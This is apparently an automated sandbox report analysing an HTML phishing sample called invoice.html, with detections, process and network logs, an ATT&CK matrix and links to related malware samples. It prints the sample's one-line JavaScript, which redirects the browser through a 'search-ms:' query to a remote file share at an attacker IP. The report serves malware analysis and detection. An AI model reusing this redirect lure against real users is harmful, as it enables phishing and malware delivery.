Edit tour

Windows Analysis Report
invoice.html

Overview

General Information

Sample name:	invoice.html
Analysis ID:	1575919
MD5:	ddb1087a289ce03eb1ccc691fae37767
SHA1:	ef34f5e6e32c3b3f817f7814d7999d9c68e628b4
SHA256:	ce001834ae69247cca8c9d5688739032c6e71503ce7a83bb1f69eeb540265a25
Tags:	154-216-18-69htmluser-JAMESWT_MHT
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious Javascript

Detected javascript redirector / loader

HTML document with suspicious name

HTML sample is only containing javascript code

Suspicious Javascript code found in HTML file

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\invoice.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2240,i,13861710889327470393,8182189587716935906,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: invoice.html

ReversingLabs: Detection: 21%

Phishing

AI detected suspicious Javascript

Source: 0.0.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/invoice.html... This script exhibits high-risk behavior by dynamically constructing a URL with suspicious parameters and redirecting the user to it. The use of the 'search-ms:' protocol and the inclusion of a hardcoded IP address in the URL suggest potential malicious intent, such as a phishing or malware attack.

Detected javascript redirector / loader

Source: invoice.html

HTTP Parser: Low number of body elements: 0

HTML sample is only containing javascript code

Source: invoice.html

HTTP Parser: <script> var url = "search-ms:query=review&crumb=location:\\\\154.216.18.89\&displayname=INVOICES"; window.location.href = url; </script>

Suspicious Javascript code found in HTML file

Source: invoice.html	HTTP Parser: location.href
Source: invoice.html	HTTP Parser: .location
Source: invoice.html	HTTP Parser: .location

Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.18.89:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50047 version: TLS 1.2

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.18.89
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190

Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239360265013_1UVY69FM05I7V26BP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239381718310_196JULM87GXSDC05M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239360265014_1I9L6MC65FHDFQ9Z7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239391107108_1TZ58OTQM3R24HW58&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239381718311_1O3ACXF8KC2UFP8NW&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239391107109_1SH77WM6DL1O8ONKY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239360312917_16ZMDWEI5FV6CL9RM&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239360312918_180TGJBF6DGGGWMR4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239357448969_167ANDP278VEQSWN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239357448970_1TNLOVSCGCA1OJSDO&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239381687775_1ATJGWTGK72EI5PK1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239381687776_1QZR1YSB08WBPILZM&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848

Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.18.89:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50047 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: invoice.html

Initial sample: invoice

Source: classification engine

Classification label: mal68.phis.winHTML@27/0@2/5

Source: invoice.html

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\invoice.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2240,i,13861710889327470393,8182189587716935906,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2240,i,13861710889327470393,8182189587716935906,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
invoice.html	21%	ReversingLabs	Win32.Exploit.Minerva

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.250.181.68	true	false		high

Contacted URLs

Name	Malicious	Reputation
https://tse1.mm.bing.net/th?id=OADD2.10239391107108_1TZ58OTQM3R24HW58&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239391107109_1SH77WM6DL1O8ONKY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239360312918_180TGJBF6DGGGWMR4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239357448969_167ANDP278VEQSWN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239381687775_1ATJGWTGK72EI5PK1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239381718311_1O3ACXF8KC2UFP8NW&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239360265013_1UVY69FM05I7V26BP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239360312917_16ZMDWEI5FV6CL9RM&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239357448970_1TNLOVSCGCA1OJSDO&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239381718310_196JULM87GXSDC05M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239381687776_1QZR1YSB08WBPILZM&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239360265014_1I9L6MC65FHDFQ9Z7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
154.216.18.89	unknown	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.23
192.168.2.6

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575919
Start date and time:	2024-12-16 11:23:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	invoice.html
Detection:	MAL
Classification:	mal68.phis.winHTML@27/0@2/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.21.35, 173.194.222.84, 142.250.181.142, 172.217.17.46, 172.217.17.42, 172.217.19.202, 216.58.208.234, 142.250.181.138, 142.250.181.42, 142.250.181.74, 142.250.181.106, 172.217.19.234, 172.217.17.74, 2.22.50.144, 172.217.17.35, 13.107.246.63, 20.190.147.12, 23.218.208.109, 20.223.35.26, 4.175.87.197, 2.16.158.32, 150.171.28.10, 2.16.158.185
Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, clientservices.googleapis.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, login.live.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: invoice.html

Input	Output
URL: file:///C:/Users/user/Desktop/invoice.html... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script exhibits high-risk behavior by dynamically constructing a URL with suspicious parameters and redirecting the user to it. The use of the 'search-ms:' protocol and the inclusion of a hardcoded IP address in the URL suggest potential malicious intent, such as a phishing or malware attack." }
var url = "search-ms:query=review&crumb=location:\\\\154.216.18.89\&displayname=INVOICES"; window.location.href = url;
URL: :// Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: ://

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	PAYMENT RECEIPT.html	Get hash	malicious	HTMLPhisher	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	ISstavUP06.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	9c14ZqBljq.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	4TPPuMwzSA.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	JitV1ZmNpU.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	http://minimalfreaks.co	Get hash	malicious	HTMLPhisher	Browse
	3heg4J3dth.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse
	BSKaRtL9iP.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	Arrival Notice.vbs	Get hash	malicious	Remcos, GuLoader	Browse	154.216.17.190
	1734335488857ad04f18b89ed443298ec4ba194986b75012687d1a4e65fb772a035ff002b3927.dat-decoded.exe	Get hash	malicious	XWorm	Browse	154.216.17.204
	17343353665dbf331bb34348160d07a40652276a18d932b7a75cefa9161a74f0bd5e08d97f649.dat-decoded.exe	Get hash	malicious	Remcos	Browse	154.216.17.204
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar, Xmrig	Browse	154.216.20.243
	arm6.elf	Get hash	malicious	Unknown	Browse	154.211.34.28
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	154.216.16.83
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	154.216.16.83
	RMX.exe	Get hash	malicious	Remcos	Browse	154.216.18.132
	byte.m68k.elf	Get hash	malicious	Okiru	Browse	154.216.19.200
	byte.arm7.elf	Get hash	malicious	Mirai, Okiru	Browse	154.216.19.200

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	BjLxqVU7m4.dll	Get hash	malicious	Unknown	Browse	154.216.18.89
	Ne7qNMCeuy.exe	Get hash	malicious	Unknown	Browse	154.216.18.89
	Q7I4ToJZ0R.exe	Get hash	malicious	Unknown	Browse	154.216.18.89
	BjLxqVU7m4.dll	Get hash	malicious	Unknown	Browse	154.216.18.89
	Ne7qNMCeuy.exe	Get hash	malicious	Unknown	Browse	154.216.18.89
	Q7I4ToJZ0R.exe	Get hash	malicious	Unknown	Browse	154.216.18.89
	LgigaSKsL6.exe	Get hash	malicious	SmokeLoader	Browse	154.216.18.89
	file.exe	Get hash	malicious	SmokeLoader	Browse	154.216.18.89
	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	154.216.18.89
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	154.216.18.89
3b5074b1b5d032e5620f69f9f700ff0e	rDOC24INV0616.exe	Get hash	malicious	AgentTesla	Browse	20.198.118.190
	https://t.co/eSJUUrWOcO	Get hash	malicious	HTMLPhisher	Browse	20.198.118.190
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	20.198.118.190
	InvoiceNr274728.pdf.lnk	Get hash	malicious	Unknown	Browse	20.198.118.190
	A6IuJ5NneS.lnk	Get hash	malicious	LummaC	Browse	20.198.118.190
	KlarnaInvoice229837.pdf.lnk	Get hash	malicious	LummaC	Browse	20.198.118.190
	Arrival Notice.vbs	Get hash	malicious	Remcos, GuLoader	Browse	20.198.118.190
	SWIFT091816-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	20.198.118.190
